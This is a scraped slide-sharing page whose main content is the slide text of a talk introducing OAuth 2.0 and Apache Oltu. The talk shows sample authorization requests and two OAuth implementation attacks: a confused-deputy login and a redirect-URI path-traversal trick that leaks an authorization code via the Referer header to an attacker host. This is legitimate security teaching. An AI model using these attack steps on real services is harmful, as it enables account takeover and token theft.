REST Service Authetication with TLS & JWTsREST Service Authetication with TLS & JWTs
REST Service Authetication with TLS & JWTs
Jon Todd
 
Building Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTsBuilding Secure User Interfaces With JWTs
Building Secure User Interfaces With JWTs
robertjd
 
Demystifying OAuth 2.0
Demystifying OAuth 2.0Demystifying OAuth 2.0
Demystifying OAuth 2.0
Karl McGuinness
 
Json web token api authorization
Json web token api authorizationJson web token api authorization
Json web token api authorization
Giulio De Donato
 
OAuth 2 Presentation
OAuth 2 PresentationOAuth 2 Presentation
OAuth 2 Presentation
Mohamed Ahmed Abdullah
 
What the Heck is OAuth and OpenID Connect - DOSUG 2018
What the Heck is OAuth and OpenID Connect - DOSUG 2018What the Heck is OAuth and OpenID Connect - DOSUG 2018
What the Heck is OAuth and OpenID Connect - DOSUG 2018
Matt Raible
 

Viewers also liked (19)

JavaOne 2014 - Securing RESTful Resources with OAuth2
JavaOne 2014 - Securing RESTful Resources with OAuth2JavaOne 2014 - Securing RESTful Resources with OAuth2
JavaOne 2014 - Securing RESTful Resources with OAuth2
Rodrigo Cândido da Silva
 
How to defend from an attacker armed with a mathematician
How to defend from an attacker armed with a mathematicianHow to defend from an attacker armed with a mathematician
How to defend from an attacker armed with a mathematician
Antonio Sanso
 
Gramática - Termos Integrantes
Gramática - Termos IntegrantesGramática - Termos Integrantes
Gramática - Termos Integrantes
Mentor Concursos
 
TDC2016SP - Aperfeiçoando seu código com Stream
TDC2016SP - Aperfeiçoando seu código com StreamTDC2016SP - Aperfeiçoando seu código com Stream
TDC2016SP - Aperfeiçoando seu código com Stream
tdc-globalcode
 
Top X OAuth 2 Hacks
Top X OAuth 2 HacksTop X OAuth 2 Hacks
Top X OAuth 2 Hacks
Antonio Sanso
 
Cqcon2015
Cqcon2015Cqcon2015
Cqcon2015
Antonio Sanso
 
Mixing OAuth 2.0, Jersey and Guice to Build an Ecosystem of Apps - JavaOne...
Mixing OAuth 2.0, Jersey and Guice to Build an Ecosystem of Apps - JavaOne...Mixing OAuth 2.0, Jersey and Guice to Build an Ecosystem of Apps - JavaOne...
Mixing OAuth 2.0, Jersey and Guice to Build an Ecosystem of Apps - JavaOne...
Hermann Burgmeier
 
OAuth2 + API Security
OAuth2 + API SecurityOAuth2 + API Security
OAuth2 + API Security
Amila Paranawithana
 
Rest Security with JAX-RS
Rest Security with JAX-RSRest Security with JAX-RS
Rest Security with JAX-RS
Frank Kim
 
OAuth2 - Introduction
OAuth2 - IntroductionOAuth2 - Introduction
OAuth2 - Introduction
Knoldus Inc.
 
Cqcon
CqconCqcon
Cqcon
Antonio Sanso
 
OAuth - GDG Korea Women 2014 첫 스터디
OAuth - GDG Korea Women 2014 첫 스터디OAuth - GDG Korea Women 2014 첫 스터디
OAuth - GDG Korea Women 2014 첫 스터디
Jua Alice Kim
 
Opensource Authentication and Authorization
Opensource Authentication and AuthorizationOpensource Authentication and Authorization
Opensource Authentication and Authorization
ConFoo
 
ConFoo 2015 - Securing RESTful resources with OAuth2
ConFoo 2015 - Securing RESTful resources with OAuth2ConFoo 2015 - Securing RESTful resources with OAuth2
ConFoo 2015 - Securing RESTful resources with OAuth2
Rodrigo Cândido da Silva
 
Speeding Up Innovation
Speeding Up InnovationSpeeding Up Innovation
Speeding Up Innovation
Adrian Cockcroft
 
Lecture 19 parekh non insertional and insertional achilles tears
Lecture 19 parekh non insertional and insertional achilles tearsLecture 19 parekh non insertional and insertional achilles tears
Lecture 19 parekh non insertional and insertional achilles tears
Selene G. Parekh, MD, MBA
 
An Introduction to OAuth 2
An Introduction to OAuth 2An Introduction to OAuth 2
An Introduction to OAuth 2
Aaron Parecki
 
Intro to Amazon S3
Intro to Amazon S3Intro to Amazon S3
Intro to Amazon S3
Yu Lun Teo
 
C# OOP Advanced Concepts
C# OOP Advanced ConceptsC# OOP Advanced Concepts
C# OOP Advanced Concepts
agni_agbc
 
JavaOne 2014 - Securing RESTful Resources with OAuth2
JavaOne 2014 - Securing RESTful Resources with OAuth2JavaOne 2014 - Securing RESTful Resources with OAuth2
JavaOne 2014 - Securing RESTful Resources with OAuth2
Rodrigo Cândido da Silva
 
How to defend from an attacker armed with a mathematician
How to defend from an attacker armed with a mathematicianHow to defend from an attacker armed with a mathematician
How to defend from an attacker armed with a mathematician
Antonio Sanso
 
Gramática - Termos Integrantes
Gramática - Termos IntegrantesGramática - Termos Integrantes
Gramática - Termos Integrantes
Mentor Concursos
 
TDC2016SP - Aperfeiçoando seu código com Stream
TDC2016SP - Aperfeiçoando seu código com StreamTDC2016SP - Aperfeiçoando seu código com Stream
TDC2016SP - Aperfeiçoando seu código com Stream
tdc-globalcode
 
Top X OAuth 2 Hacks
Top X OAuth 2 HacksTop X OAuth 2 Hacks
Top X OAuth 2 Hacks
Antonio Sanso
 
Cqcon2015
Cqcon2015Cqcon2015
Cqcon2015
Antonio Sanso
 
Mixing OAuth 2.0, Jersey and Guice to Build an Ecosystem of Apps - JavaOne...
Mixing OAuth 2.0, Jersey and Guice to Build an Ecosystem of Apps - JavaOne...Mixing OAuth 2.0, Jersey and Guice to Build an Ecosystem of Apps - JavaOne...
Mixing OAuth 2.0, Jersey and Guice to Build an Ecosystem of Apps - JavaOne...
Hermann Burgmeier
 
OAuth2 + API Security
OAuth2 + API SecurityOAuth2 + API Security
OAuth2 + API Security
Amila Paranawithana
 
Rest Security with JAX-RS
Rest Security with JAX-RSRest Security with JAX-RS
Rest Security with JAX-RS
Frank Kim
 
OAuth2 - Introduction
OAuth2 - IntroductionOAuth2 - Introduction
OAuth2 - Introduction
Knoldus Inc.
 
Cqcon
CqconCqcon
Cqcon
Antonio Sanso
 
OAuth - GDG Korea Women 2014 첫 스터디
OAuth - GDG Korea Women 2014 첫 스터디OAuth - GDG Korea Women 2014 첫 스터디
OAuth - GDG Korea Women 2014 첫 스터디
Jua Alice Kim
 
Opensource Authentication and Authorization
Opensource Authentication and AuthorizationOpensource Authentication and Authorization
Opensource Authentication and Authorization
ConFoo
 
ConFoo 2015 - Securing RESTful resources with OAuth2
ConFoo 2015 - Securing RESTful resources with OAuth2ConFoo 2015 - Securing RESTful resources with OAuth2
ConFoo 2015 - Securing RESTful resources with OAuth2
Rodrigo Cândido da Silva
 
Speeding Up Innovation
Speeding Up InnovationSpeeding Up Innovation
Speeding Up Innovation
Adrian Cockcroft
 
Lecture 19 parekh non insertional and insertional achilles tears
Lecture 19 parekh non insertional and insertional achilles tearsLecture 19 parekh non insertional and insertional achilles tears
Lecture 19 parekh non insertional and insertional achilles tears
Selene G. Parekh, MD, MBA
 
An Introduction to OAuth 2
An Introduction to OAuth 2An Introduction to OAuth 2
An Introduction to OAuth 2
Aaron Parecki
 
Intro to Amazon S3
Intro to Amazon S3Intro to Amazon S3
Intro to Amazon S3
Yu Lun Teo
 
C# OOP Advanced Concepts
C# OOP Advanced ConceptsC# OOP Advanced Concepts
C# OOP Advanced Concepts
agni_agbc
 

Similar to OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu (20)

The Identity Problem of the Web and how to solve it
The Identity Problem of the Web and how to solve itThe Identity Problem of the Web and how to solve it
The Identity Problem of the Web and how to solve it
Bastian Hofmann
 
OAuth and OEmbed
OAuth and OEmbedOAuth and OEmbed
OAuth and OEmbed
leahculver
 
OAuth con doorkeeper
OAuth con doorkeeperOAuth con doorkeeper
OAuth con doorkeeper
Sergio Marin
 
Introductions of Messaging bot 做聊天機器人
Introductions of Messaging bot 做聊天機器人Introductions of Messaging bot 做聊天機器人
Introductions of Messaging bot 做聊天機器人
Johnny Sung
 
Introduction to python scrapping
Introduction to python scrappingIntroduction to python scrapping
Introduction to python scrapping
n|u - The Open Security Community
 
I Don't Care About Security (And Neither Should You)
I Don't Care About Security (And Neither Should You)I Don't Care About Security (And Neither Should You)
I Don't Care About Security (And Neither Should You)
Joel Lord
 
Api security with OAuth
Api security with OAuthApi security with OAuth
Api security with OAuth
thariyarox
 
Stateless authentication for microservices applications - JavaLand 2015
Stateless authentication for microservices applications - JavaLand 2015Stateless authentication for microservices applications - JavaLand 2015
Stateless authentication for microservices applications - JavaLand 2015
Alvaro Sanchez-Mariscal
 
Integrating WordPress With Web APIs
Integrating WordPress With Web APIsIntegrating WordPress With Web APIs
Integrating WordPress With Web APIs
randyhoyt
 
Chrome Dev Summit 2020 Extended: Improve Your Web Authentication Security
Chrome Dev Summit 2020 Extended: Improve Your Web Authentication SecurityChrome Dev Summit 2020 Extended: Improve Your Web Authentication Security
Chrome Dev Summit 2020 Extended: Improve Your Web Authentication Security
Yu-Shuan Hsieh
 
I Don't Care About Security (And Neither Should You)
I Don't Care About Security (And Neither Should You)I Don't Care About Security (And Neither Should You)
I Don't Care About Security (And Neither Should You)
Joel Lord
 
Some OAuth love
Some OAuth loveSome OAuth love
Some OAuth love
Nicolas Blanco
 
Integrating WordPress With Web APIs
Integrating WordPress With Web APIsIntegrating WordPress With Web APIs
Integrating WordPress With Web APIs
randyhoyt
 
Authorization with oAuth
Authorization with oAuthAuthorization with oAuth
Authorization with oAuth
Vivastream
 
O auth how_to
O auth how_toO auth how_to
O auth how_to
vivaqa
 
OAuth
OAuthOAuth
OAuth
Blaine
 
OAuth 2 at Webvisions
OAuth 2 at WebvisionsOAuth 2 at Webvisions
OAuth 2 at Webvisions
Aaron Parecki
 
I Don't Care About Security
I Don't Care About Security I Don't Care About Security
I Don't Care About Security
Joel Lord
 
Securing APIs using OAuth 2.0
Securing APIs using OAuth 2.0Securing APIs using OAuth 2.0
Securing APIs using OAuth 2.0
Adam Lewis
 
The Current State of OAuth 2
The Current State of OAuth 2The Current State of OAuth 2
The Current State of OAuth 2
Aaron Parecki
 
The Identity Problem of the Web and how to solve it
The Identity Problem of the Web and how to solve itThe Identity Problem of the Web and how to solve it
The Identity Problem of the Web and how to solve it
Bastian Hofmann
 
OAuth and OEmbed
OAuth and OEmbedOAuth and OEmbed
OAuth and OEmbed
leahculver
 
OAuth con doorkeeper
OAuth con doorkeeperOAuth con doorkeeper
OAuth con doorkeeper
Sergio Marin
 
Introductions of Messaging bot 做聊天機器人
Introductions of Messaging bot 做聊天機器人Introductions of Messaging bot 做聊天機器人
Introductions of Messaging bot 做聊天機器人
Johnny Sung
 
Introduction to python scrapping
Introduction to python scrappingIntroduction to python scrapping
Introduction to python scrapping
n|u - The Open Security Community
 
I Don't Care About Security (And Neither Should You)
I Don't Care About Security (And Neither Should You)I Don't Care About Security (And Neither Should You)
I Don't Care About Security (And Neither Should You)
Joel Lord
 
Api security with OAuth
Api security with OAuthApi security with OAuth
Api security with OAuth
thariyarox
 
Stateless authentication for microservices applications - JavaLand 2015
Stateless authentication for microservices applications - JavaLand 2015Stateless authentication for microservices applications - JavaLand 2015
Stateless authentication for microservices applications - JavaLand 2015
Alvaro Sanchez-Mariscal
 
Integrating WordPress With Web APIs
Integrating WordPress With Web APIsIntegrating WordPress With Web APIs
Integrating WordPress With Web APIs
randyhoyt
 
Chrome Dev Summit 2020 Extended: Improve Your Web Authentication Security
Chrome Dev Summit 2020 Extended: Improve Your Web Authentication SecurityChrome Dev Summit 2020 Extended: Improve Your Web Authentication Security
Chrome Dev Summit 2020 Extended: Improve Your Web Authentication Security
Yu-Shuan Hsieh
 
I Don't Care About Security (And Neither Should You)
I Don't Care About Security (And Neither Should You)I Don't Care About Security (And Neither Should You)
I Don't Care About Security (And Neither Should You)
Joel Lord
 
Some OAuth love
Some OAuth loveSome OAuth love
Some OAuth love
Nicolas Blanco
 
Integrating WordPress With Web APIs
Integrating WordPress With Web APIsIntegrating WordPress With Web APIs
Integrating WordPress With Web APIs
randyhoyt
 
Authorization with oAuth
Authorization with oAuthAuthorization with oAuth
Authorization with oAuth
Vivastream
 
O auth how_to
O auth how_toO auth how_to
O auth how_to
vivaqa
 
OAuth
OAuthOAuth
OAuth
Blaine
 
OAuth 2 at Webvisions
OAuth 2 at WebvisionsOAuth 2 at Webvisions
OAuth 2 at Webvisions
Aaron Parecki
 
I Don't Care About Security
I Don't Care About Security I Don't Care About Security
I Don't Care About Security
Joel Lord
 
Securing APIs using OAuth 2.0
Securing APIs using OAuth 2.0Securing APIs using OAuth 2.0
Securing APIs using OAuth 2.0
Adam Lewis
 
The Current State of OAuth 2
The Current State of OAuth 2The Current State of OAuth 2
The Current State of OAuth 2
Aaron Parecki
 

Recently uploaded (17)

Inter-Mirifica-Navigating-Media-in-the-Modern-World.pptx
Inter-Mirifica-Navigating-Media-in-the-Modern-World.pptxInter-Mirifica-Navigating-Media-in-the-Modern-World.pptx
Inter-Mirifica-Navigating-Media-in-the-Modern-World.pptx
secretarysocom
 
Vigilanti-Cura-Protecting-the-Faith.pptx
Vigilanti-Cura-Protecting-the-Faith.pptxVigilanti-Cura-Protecting-the-Faith.pptx
Vigilanti-Cura-Protecting-the-Faith.pptx
secretarysocom
 
What to Expect When Hiring Shopify Development Services_ A Technical Walkthro...
What to Expect When Hiring Shopify Development Services_ A Technical Walkthro...What to Expect When Hiring Shopify Development Services_ A Technical Walkthro...
What to Expect When Hiring Shopify Development Services_ A Technical Walkthro...
CartCoders
 
最新版西班牙加泰罗尼亚国际大学毕业证(UIC毕业证书)原版定制
最新版西班牙加泰罗尼亚国际大学毕业证(UIC毕业证书)原版定制最新版西班牙加泰罗尼亚国际大学毕业证(UIC毕业证书)原版定制
最新版西班牙加泰罗尼亚国际大学毕业证(UIC毕业证书)原版定制
Taqyea
 
Networking_Essentials_version_3.0_-_Module_7.pptx
Networking_Essentials_version_3.0_-_Module_7.pptxNetworking_Essentials_version_3.0_-_Module_7.pptx
Networking_Essentials_version_3.0_-_Module_7.pptx
elestirmen
 
Cloud Computing - iCloud by Hamza Anwaar .pptx
Cloud Computing - iCloud by Hamza Anwaar .pptxCloud Computing - iCloud by Hamza Anwaar .pptx
Cloud Computing - iCloud by Hamza Anwaar .pptx
islamicknowledge5224
 
UV_Unwrapping_Lecture_with_Figures.pptx presentation for lecture of animation
UV_Unwrapping_Lecture_with_Figures.pptx presentation for lecture of animationUV_Unwrapping_Lecture_with_Figures.pptx presentation for lecture of animation
UV_Unwrapping_Lecture_with_Figures.pptx presentation for lecture of animation
17218
 
ARTIFICIAL INTELLIGENCE.pptx2565567765676
ARTIFICIAL INTELLIGENCE.pptx2565567765676ARTIFICIAL INTELLIGENCE.pptx2565567765676
ARTIFICIAL INTELLIGENCE.pptx2565567765676
areebaimtiazpmas
 
Darley - BSides Nairobi (2025-06-07) Epochalypse 2038 - Time is Not on Our Si...
Darley - BSides Nairobi (2025-06-07) Epochalypse 2038 - Time is Not on Our Si...Darley - BSides Nairobi (2025-06-07) Epochalypse 2038 - Time is Not on Our Si...
Darley - BSides Nairobi (2025-06-07) Epochalypse 2038 - Time is Not on Our Si...
treyka
 
Predicting Site Quality Google Patent US9767157B2 - Behzad Hussain.pdf
Predicting Site Quality Google Patent US9767157B2 - Behzad Hussain.pdfPredicting Site Quality Google Patent US9767157B2 - Behzad Hussain.pdf
Predicting Site Quality Google Patent US9767157B2 - Behzad Hussain.pdf
Behzad Hussain
 
How to Make Money as a Cam Model – Tips, Tools & Real Talk
How to Make Money as a Cam Model – Tips, Tools & Real TalkHow to Make Money as a Cam Model – Tips, Tools & Real Talk
How to Make Money as a Cam Model – Tips, Tools & Real Talk
Cam Sites Expert
 
3D Graphics an introduction and details .pptx
3D Graphics an introduction and details .pptx3D Graphics an introduction and details .pptx
3D Graphics an introduction and details .pptx
islamicknowledge5224
 
Google_Cloud_Computing_Fundamentals.pptx
Google_Cloud_Computing_Fundamentals.pptxGoogle_Cloud_Computing_Fundamentals.pptx
Google_Cloud_Computing_Fundamentals.pptx
ektadangwal2005
 
Internet_of_Things_Presentation_by-Humera.pptx
Internet_of_Things_Presentation_by-Humera.pptxInternet_of_Things_Presentation_by-Humera.pptx
Internet_of_Things_Presentation_by-Humera.pptx
cshumerabashir
 
10 Latest Technologies and Their Benefits to End.pptx
10 Latest Technologies and Their Benefits to End.pptx10 Latest Technologies and Their Benefits to End.pptx
10 Latest Technologies and Their Benefits to End.pptx
EphraimOOghodero
 
MOBILE PHONE DATA presentation with all necessary details
MOBILE PHONE DATA presentation with all necessary detailsMOBILE PHONE DATA presentation with all necessary details
MOBILE PHONE DATA presentation with all necessary details
benamorraj
 
ICP -2 Review – What It Is, and How to Participate and Provide Your Feedback
ICP -2 Review – What It Is, and How to Participate and Provide Your FeedbackICP -2 Review – What It Is, and How to Participate and Provide Your Feedback
ICP -2 Review – What It Is, and How to Participate and Provide Your Feedback
APNIC
 
Inter-Mirifica-Navigating-Media-in-the-Modern-World.pptx
Inter-Mirifica-Navigating-Media-in-the-Modern-World.pptxInter-Mirifica-Navigating-Media-in-the-Modern-World.pptx
Inter-Mirifica-Navigating-Media-in-the-Modern-World.pptx
secretarysocom
 
Vigilanti-Cura-Protecting-the-Faith.pptx
Vigilanti-Cura-Protecting-the-Faith.pptxVigilanti-Cura-Protecting-the-Faith.pptx
Vigilanti-Cura-Protecting-the-Faith.pptx
secretarysocom
 
What to Expect When Hiring Shopify Development Services_ A Technical Walkthro...
What to Expect When Hiring Shopify Development Services_ A Technical Walkthro...What to Expect When Hiring Shopify Development Services_ A Technical Walkthro...
What to Expect When Hiring Shopify Development Services_ A Technical Walkthro...
CartCoders
 
最新版西班牙加泰罗尼亚国际大学毕业证(UIC毕业证书)原版定制
最新版西班牙加泰罗尼亚国际大学毕业证(UIC毕业证书)原版定制最新版西班牙加泰罗尼亚国际大学毕业证(UIC毕业证书)原版定制
最新版西班牙加泰罗尼亚国际大学毕业证(UIC毕业证书)原版定制
Taqyea
 
Networking_Essentials_version_3.0_-_Module_7.pptx
Networking_Essentials_version_3.0_-_Module_7.pptxNetworking_Essentials_version_3.0_-_Module_7.pptx
Networking_Essentials_version_3.0_-_Module_7.pptx
elestirmen
 
Cloud Computing - iCloud by Hamza Anwaar .pptx
Cloud Computing - iCloud by Hamza Anwaar .pptxCloud Computing - iCloud by Hamza Anwaar .pptx
Cloud Computing - iCloud by Hamza Anwaar .pptx
islamicknowledge5224
 
UV_Unwrapping_Lecture_with_Figures.pptx presentation for lecture of animation
UV_Unwrapping_Lecture_with_Figures.pptx presentation for lecture of animationUV_Unwrapping_Lecture_with_Figures.pptx presentation for lecture of animation
UV_Unwrapping_Lecture_with_Figures.pptx presentation for lecture of animation
17218
 
ARTIFICIAL INTELLIGENCE.pptx2565567765676
ARTIFICIAL INTELLIGENCE.pptx2565567765676ARTIFICIAL INTELLIGENCE.pptx2565567765676
ARTIFICIAL INTELLIGENCE.pptx2565567765676
areebaimtiazpmas
 
Darley - BSides Nairobi (2025-06-07) Epochalypse 2038 - Time is Not on Our Si...
Darley - BSides Nairobi (2025-06-07) Epochalypse 2038 - Time is Not on Our Si...Darley - BSides Nairobi (2025-06-07) Epochalypse 2038 - Time is Not on Our Si...
Darley - BSides Nairobi (2025-06-07) Epochalypse 2038 - Time is Not on Our Si...
treyka
 
Predicting Site Quality Google Patent US9767157B2 - Behzad Hussain.pdf
Predicting Site Quality Google Patent US9767157B2 - Behzad Hussain.pdfPredicting Site Quality Google Patent US9767157B2 - Behzad Hussain.pdf
Predicting Site Quality Google Patent US9767157B2 - Behzad Hussain.pdf
Behzad Hussain
 
How to Make Money as a Cam Model – Tips, Tools & Real Talk
How to Make Money as a Cam Model – Tips, Tools & Real TalkHow to Make Money as a Cam Model – Tips, Tools & Real Talk
How to Make Money as a Cam Model – Tips, Tools & Real Talk
Cam Sites Expert
 
3D Graphics an introduction and details .pptx
3D Graphics an introduction and details .pptx3D Graphics an introduction and details .pptx
3D Graphics an introduction and details .pptx
islamicknowledge5224
 
Google_Cloud_Computing_Fundamentals.pptx
Google_Cloud_Computing_Fundamentals.pptxGoogle_Cloud_Computing_Fundamentals.pptx
Google_Cloud_Computing_Fundamentals.pptx
ektadangwal2005
 
Internet_of_Things_Presentation_by-Humera.pptx
Internet_of_Things_Presentation_by-Humera.pptxInternet_of_Things_Presentation_by-Humera.pptx
Internet_of_Things_Presentation_by-Humera.pptx
cshumerabashir
 
10 Latest Technologies and Their Benefits to End.pptx
10 Latest Technologies and Their Benefits to End.pptx10 Latest Technologies and Their Benefits to End.pptx
10 Latest Technologies and Their Benefits to End.pptx
EphraimOOghodero
 
MOBILE PHONE DATA presentation with all necessary details
MOBILE PHONE DATA presentation with all necessary detailsMOBILE PHONE DATA presentation with all necessary details
MOBILE PHONE DATA presentation with all necessary details
benamorraj
 
ICP -2 Review – What It Is, and How to Participate and Provide Your Feedback
ICP -2 Review – What It Is, and How to Participate and Provide Your FeedbackICP -2 Review – What It Is, and How to Participate and Provide Your Feedback
ICP -2 Review – What It Is, and How to Participate and Provide Your Feedback
APNIC
 

OAuth Hacks A gentle introduction to OAuth 2 and Apache Oltu

  • 1. OAuth Hacks
 A Gentle Introduction to OAuth 2.0 and Apache Oltu 
 Antonio Sanso (@asanso) Software Engineer Adobe Research Switzerland
  • 2. Who is this guy, BTW? eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ 9.eyJhdWQiOiJjb25uZWN0MjAxNCIsIm lzcyI6ImFzYW5zbyIsInN1YiI6ImFzYW5 zbyIsImV4cCI6MTQwMzYwMTU1OSwi aWF0IjoxNDAzNjAxNTU5fQ.9- MaGUiPg07ezuP9yAOaVLETQH6HMO pfoGwg_c0-PDw
  • 3. Who is this guy, BTW? {  Software Engineer Adobe Research Switzerland {  VP (Chair) Apache Oltu (OAuth Protocol Implementation in Java) {  Committer and PMC Member for Apache Sling {  Google Security Hall of Fame, Facebook Security Whitehat, GitHub Security Bug Bounty
  • 4. My (little) contribution to OAuth Not an RFC, still in the draft phase
  • 5. Agenda { Introducing OAuth 2.0 { The “OAuth dance” { Introducing Apache Oltu { Implementing OAuth 2.0 { OAuth 2.0 Implementation Vulnerabilities { OAuth 2.0 server to server ★
  • 6. Why OAuth? Several web sites offer you the chance to import the list of your contacts. It ONLY requires you giving your username and password. HOW NICE
  • 7. A bit of history – OAuth 1.0a
  • 8. A bit of history – OAuth 2.0 2 years X
  • 9. The good { OAuth 2.0 is easier to use and implement (compared to OAuth 1.0) { Wide spread and continuing growing { Short lived Tokens { Encapsulated Tokens * Image taken from the movie "The Good, the Bad and the Ugly"
  • 10. The bad { No signature (relies solely on SSL/TLS ), Bearer Tokens { No built-in security { Can be dangerous if used from not experienced people { Burden on the client * Image taken from the movie "The Good, the Bad and the Ugly"
  • 11. The ugly { Too many compromises. Working group did not take clear decisions { Oauth 2.0 spec is not a protocol, it is rather a framework - RFC 6749 :The OAuth 2.0 Authorization Framework { Not interoperable - from the spec: “…this specification is likely to produce a wide range of non-interoperable implementations.” !! { Mobile integration (web views) { A lot of FUD * Image taken from the movie "The Good, the Bad and the Ugly"
  • 12. So what should I use? { No many alternatives { OAuth 1.0 does not scale (and it is complicated)
  • 13. OAuth flows { Authorization Code Grant (aka server side flow) ✓ { Implicit Grant (aka Client side flow) ✓ { Resource Owner Password Credentials Grant { Client Credentials Grant
  • 14. OAuth Actors {  Resource Owner (Alice) { Client (Bob, worker at www.printondemand.biz ) { Server (Carol from Facebook) www.printondemand.biz
  • 15. Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz 1. I want an Authz Code 2. Printondemand wants an Authz Code 3. Login and authorize 4. Here the Authz Code 5. Here we go Authorization: Bearer 1017097752d5f18f716cc90ac8a5e4c2a9ace6b9 ★
  • 16. Traditional OAuth “dance” #2- client side flow 1616 www.printondemand.biz 1. I want an Access Token 2. Printondemand wants an Access Token 3. Login and authorize 4. Here the Access Token 5. Here we go ★
  • 17. Apache Oltu { 2010 - Project enters incubation with the name of Apache Amber { 2013 - Amber graduates from the incubator with the name Apache Oltu { OAuth protocol implementation in Java (OAuth client and server) { It also covers others "OAuth family" related implementations such as JWT, JWS
  • 18. How difficult is to implement OAuth ? OAuth client OAuth server
  • 19. Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz 1. I want an Authz Code 2. Printondemand wants an Authz Code 3. Here the Authz Code 4. Here we go ★ GET /oauth/authorize?response_type=code&! client_id=bfq5abhdq4on33igtmd74ptrli-9rci_8_9&! scope=profile&state=0f9c0d090e74c2a136e41f4a97ed46d29bc9b0251! &redirect_uri=https%3A%2F%2Fwww.printondemand.biz%2Fcallback ! HTTP/1.1! Host: server.oltu.com! ! Authorization Server
  • 20. Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz 1. I want an Authz Code 2. Printondemand wants an Authz Code 3. Here the Authz Code 4. Here we go ★ HTTP/1.1 302 Found! Location: https://www.printondemand.biz/callback? code=SplxlOBeZQQYbYS6WxSbIA! ! ! Authorization Server
  • 21. Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz 1. I want an Authz Code 2. Printondemand wants an Authz Code 3. Here the Authz Code 4. Here we go ★ Authorization Server
  • 22. Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Authorization Server POST /oauth/token HTTP/1.1! Host: server.oltu.com! Authorization: Basic czZCaGRSa3F0MzpnWDFmQmF0M2JW ! Content-Type: application/x-www-form-urlencoded! ! grant_type=authorization_code&code=SplxlOBeZQQYbYS6WxSbIA! &state=0f9c0d090e74c2a136e41f4a97ed46d29bc9b0251&! redirect_uri=https%3A%2F%2Fwww.printondemand.biz%2Fcallback ! ! !
  • 23. Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Authorization Server HTTP/1.1 200 OK! Content-Type: application/json;charset=UTF-8! ! {! "access_token":"1017097752d5f18f716cc90ac8a5e4c2a9ace6b9”,! "expires_in":3600 ! }! !
  • 24. Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Authorization Server
  • 25. Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Resource Server GET /profile/me HTTP/1.1! Host: server.oltu.com! Authorization: Bearer 1017097752d5f18f716cc90ac8a5e4c2a9ace6b9! !
  • 26. Traditional OAuth “dance” - Authorization Code Grant aka server side flow www.printondemand.biz ★ Resource Server
  • 28. Scalable OAuth Server { derive encryption key using salt1 { derive mac key using salt2 { generate random iv { encrypt. then mac(salt1 + iv + data) { transmit salt1, salt2 iv and encrypted
  • 31. OAuth entication orization { OAuth 2.0 is NOT an authentication protocol. It is an access delegation protocol. { It can-be-used as an authentication protocol { BUT HANDLE WITH CARE ★
  • 32. Attack #1 “confused deputy” aka “The Devil Wears Prada” www.printondemand.biz 1. I want an Access Token 2. Printondemand wants an Access Token 3. Login and authorize 4. Here the Access Token 5. Here we go 7. www.printondemand.biz uses the profile information from Facebook to log in N.B. www.printondemand.biz does not have any security. They have not Authenticated the User! * Image taken from the movie "The Devil Wears Prada"
  • 33. Attack #1 “confused deputy” aka “The Devil Wears Prada” www.printondemand.biz 1. I want an Access Token 2. Printondemand wants an Access Token 3. Login and authorize 4. Here the Access Token 5. Here we go What does this tell us ? That www.printondemand.biz authenticated us, given an Access Token 7. AUTHENTICATED * Image taken from the movie "The Devil Wears Prada"
  • 34. Attack #1 “confused deputy” aka “The Devil Wears Prada” www.printondemand.biz 1. I want an Access Token a. Here we go 3. Login and authorize 4. Here the Access Token 5. Here we go www.dosomething.biz b. Give me the profile information, here is the Access Token c. AUTHENTICATED * Image taken from the movie "The Devil Wears Prada" ★
  • 35. ✔ ✔ ✗ ✗ ✗ ✗ ✗ Attack #2 – Exploit the redirect URI aka “Lassie Come Home” * Image taken from the movie “Lassie Come Home" 1. I want an Access Token 2. Printondemand wants an Access Token GET /oauth/authorize? response_type=code&client_id=213814055461514&redirect_uri=https%3A%2F %2Fgist.github.com%2Fauth%2Ffacebook%2Fcallback! Host: https://graph.facebook.com! ✔
  • 36. Attack #2 – Exploit the redirect URI aka “Lassie Come Home” 1. I want an Access Token 2. Printondemand wants an Access Token GET /oauth/authorize? response_type=code&client_id=213814055461514&redirect_uri=https%3A%2F %2Fgist.github.com%2Fauth%2Ffacebook%2Fcallback%2F..../..../..../ asanso/a2f05bb7e38ba6af88f8! Host: https://graph.facebook.com! * Image taken from the movie “Lassie Come Home" ✔
  • 37. Attack #2 – Exploit the redirect URI aka “Lassie Come Home” 1. I want an Access Token 2. Printondemand wants an Access Token HTTP/1.1 302 Found! Location: https://gist.github.com/auth/asanso/! a2f05bb7e38ba6af88f8?code=SplxlOBeZQQYbYS6WxSbIA! * Image taken from the movie “Lassie Come Home" ...! ! ...! ! https://gist.github.com/auth/asanso/a2f05bb7e38ba6af88f8! GET / HTTP/1.1! Host: attackersite.com! Referer: https://gist.github.com/auth/asanso/a2f05bb7e38ba6af88f8! ?code=SplxlOBeZQQYbYS6WxSbIA! !
  • 38. OAuth 2.0 server to server www.printondemand.biz 1. Create and sign JWT 2. Use JWT to request token 0. Generate key pair and upload public key Your application (OAuth Client) calls OAuth Server APIs on behalf of the service account, and user consent (Resource Owner) is not required (no human interaction). Why? How? 3. Here the Access Token 4. Use Access Token to call APIs ★ Register client OAuth Server 2 Server Flow
  • 39. OAuth 2.0 server to server www.printondemand.biz 1. Create and sign JWT 2. Use JWT to request token 3. Here the Access Token 4. Use Access Token to call APIs OAuth Server 2 Server Flow
  • 40. OAuth 2.0 server to server www.printondemand.biz 1. Create and sign JWT 2. Use JWT to request token 3. Here the Access Token 4. Use Access Token to call APIs OAuth Server 2 Server Flow ! curl -d 'grant_type=urn%3Aietf%3Aparams%3Aoauth%3Agrant-type%3Ajwt bearer! &assertion=ASSERTION' https://accounts.google.com/o/oauth2/token ! !
